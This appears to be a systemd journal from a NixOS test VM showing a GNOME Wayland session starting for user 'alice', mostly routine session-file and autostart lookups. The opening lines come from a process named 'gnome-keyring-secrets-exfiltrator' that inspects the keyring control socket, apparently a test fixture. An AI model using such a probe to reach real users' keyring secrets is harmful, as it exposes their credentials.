machine # Aug 02 11:49:35 machine 440fsax2c627lm75ifmx5ya2bvk0nhp2-gnome-keyring-secrets-exfiltrator[1032]: Starting socket on /run/user/1000/keyring/control
machine # Aug 02 11:49:35 machine 440fsax2c627lm75ifmx5ya2bvk0nhp2-gnome-keyring-secrets-exfiltrator[1032]: /run/user/1000/keyring/control is a socket
machine # Aug 02 11:49:35 machine 440fsax2c627lm75ifmx5ya2bvk0nhp2-gnome-keyring-secrets-exfiltrator[1032]: /run/user/1000/keyring/control is not a symbolic link
machine # Aug 02 11:49:35 machine 440fsax2c627lm75ifmx5ya2bvk0nhp2-gnome-keyring-secrets-exfiltrator[1032]: Owner UID: 1000
machine # Aug 02 11:49:35 machine 440fsax2c627lm75ifmx5ya2bvk0nhp2-gnome-keyring-secrets-exfiltrator[1032]: File mode: 49645
machine # Aug 02 11:49:35 machine /nix/store/d92pp3wnwfh3giwcjrbzlybzpd7v1yxn-gdm-46.2/libexec/gdm-wayland-session[1051]: gnome-session-binary[1051]: DEBUG(+): Enabling debugging
machine # Aug 02 11:49:35 machine gnome-session-binary[1051]: DEBUG(+): Enabling debugging
machine # Aug 02 11:49:35 machine /nix/store/d92pp3wnwfh3giwcjrbzlybzpd7v1yxn-gdm-46.2/libexec/gdm-wayland-session[1051]: gnome-session-binary[1051]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine gnome-session-binary[1051]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine /nix/store/d92pp3wnwfh3giwcjrbzlybzpd7v1yxn-gdm-46.2/libexec/gdm-wayland-session[1051]: gnome-session-binary[1051]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine gnome-session-binary[1051]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine /nix/store/d92pp3wnwfh3giwcjrbzlybzpd7v1yxn-gdm-46.2/libexec/gdm-wayland-session[1051]: gnome-session-binary[1051]: GLib-GIO-DEBUG(+): _g_io_module_get_default: Found default implementation dconf (DConfSettingsBackend) for ‘gsettings-backend’
machine # Aug 02 11:49:35 machine gnome-session-binary[1051]: GLib-GIO-DEBUG(+): _g_io_module_get_default: Found default implementation dconf (DConfSettingsBackend) for ‘gsettings-backend’
machine # Aug 02 11:49:35 machine /nix/store/d92pp3wnwfh3giwcjrbzlybzpd7v1yxn-gdm-46.2/libexec/gdm-wayland-session[1051]: gnome-session-binary[1051]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine gnome-session-binary[1051]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine systemd[995]: Created slice Slice /app/gnome-session-manager.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 19.
machine # Aug 02 11:49:35 machine systemd[995]: Reached target GNOME Wayland Session.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 16.
machine # Aug 02 11:49:35 machine systemd[995]: Reached target Session services which should run early before the graphical session is brought up.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 39.
machine # Aug 02 11:49:35 machine systemd[995]: Reached target GNOME Shell.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 33.
machine # Aug 02 11:49:35 machine systemd[995]: Starting Monitor Session leader for GNOME Session...
machine # ░░ Subject: A start job for unit UNIT has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has begun execution.
machine # ░░
machine # ░░ The job identifier is 94.
machine # Aug 02 11:49:35 machine systemd[995]: Started Monitor Session leader for GNOME Session.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 94.
machine # Aug 02 11:49:35 machine systemd[995]: Reached target Tasks to be run before GNOME Session starts.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 38.
machine # Aug 02 11:49:35 machine systemd[995]: Starting GNOME Session Manager (session: gnome)...
machine # ░░ Subject: A start job for unit UNIT has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has begun execution.
machine # ░░
machine # ░░ The job identifier is 18.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Enabling debugging
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Enabling debugging
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): hardware acceleration already done if needed
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): hardware acceleration already done if needed
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Finding a graphical session for user 1000
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Considering session '2'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Session '2' is not a graphical session (type: 'unspecified')
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Considering session '1'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Found session ID: 1
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Finding a graphical session for user 1000
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Considering session '2'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Session '2' is not a graphical session (type: 'unspecified')
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Considering session '1'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Found session ID: 1
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Using systemd for session tracking
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Using systemd for session tracking
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: GLib-GIO-DEBUG(+): Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: GLib-GIO-DEBUG(+): _g_io_module_get_default: Found default implementation dconf (DConfSettingsBackend) for ‘gsettings-backend’
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: GLib-GIO-DEBUG(+): _g_io_module_get_default: Found default implementation dconf (DConfSettingsBackend) for ‘gsettings-backend’
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: setting client store 0x1abfbc0
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: setting client store 0x1abfbc0
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmXsmpServer: SESSION_MANAGER=local/machine:@/tmp/.ICE-unix/1076,unix/machine:/tmp/.ICE-unix/1076
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmXsmpServer: SESSION_MANAGER=local/machine:@/tmp/.ICE-unix/1076,unix/machine:/tmp/.ICE-unix/1076
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): emitting SessionIsActive
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Getting session 'gnome'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /home/alice/.config/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Cannot use session '/home/alice/.config/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Cannot use session '/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /home/alice/.nix-profile/etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Cannot use session '/home/alice/.nix-profile/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /nix/profile/etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Cannot use session '/nix/profile/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /home/alice/.local/state/nix/profile/etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Cannot use session '/home/alice/.local/state/nix/profile/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /etc/profiles/per-user/alice/etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Cannot use session '/etc/profiles/per-user/alice/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): emitting SessionIsActive
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /nix/var/nix/profiles/default/etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Cannot use session '/nix/var/nix/profiles/default/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /run/current-system/sw/etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Getting session 'gnome'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /home/alice/.config/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Cannot use session '/home/alice/.config/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Cannot use session '/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /home/alice/.nix-profile/etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Cannot use session '/home/alice/.nix-profile/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /nix/profile/etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Cannot use session '/nix/profile/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /home/alice/.local/state/nix/profile/etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Cannot use session '/home/alice/.local/state/nix/profile/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /etc/profiles/per-user/alice/etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Cannot use session '/etc/profiles/per-user/alice/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /nix/var/nix/profiles/default/etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Cannot use session '/nix/var/nix/profiles/default/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /run/current-system/sw/etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Cannot use session '/run/current-system/sw/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Cannot use session '/run/current-system/sw/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Cannot use session '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Cannot use session '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Cannot use session '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /home/alice/.nix-profile/share/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Cannot use session '/home/alice/.nix-profile/share/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /nix/profile/share/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Cannot use session '/nix/profile/share/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /home/alice/.local/state/nix/profile/share/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Cannot use session '/home/alice/.local/state/nix/profile/share/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /etc/profiles/per-user/alice/share/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Cannot use session '/etc/profiles/per-user/alice/share/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /nix/var/nix/profiles/default/share/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Cannot use session '/nix/var/nix/profiles/default/share/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /run/current-system/sw/share/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Cannot use session '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /home/alice/.nix-profile/share/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Cannot use session '/home/alice/.nix-profile/share/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /nix/profile/share/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Cannot use session '/nix/profile/share/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /home/alice/.local/state/nix/profile/share/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Cannot use session '/home/alice/.local/state/nix/profile/share/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /etc/profiles/per-user/alice/share/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Cannot use session '/etc/profiles/per-user/alice/share/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /nix/var/nix/profiles/default/share/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): Cannot use session '/nix/var/nix/profiles/default/share/gnome-session/sessions/gnome.session': non-existing or invalid file.
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Looking if /run/current-system/sw/share/gnome-session/sessions/gnome.session is a valid session file
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Checking required components
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.Shell.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): fill: *** Checking required components
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.Shell.desktop'
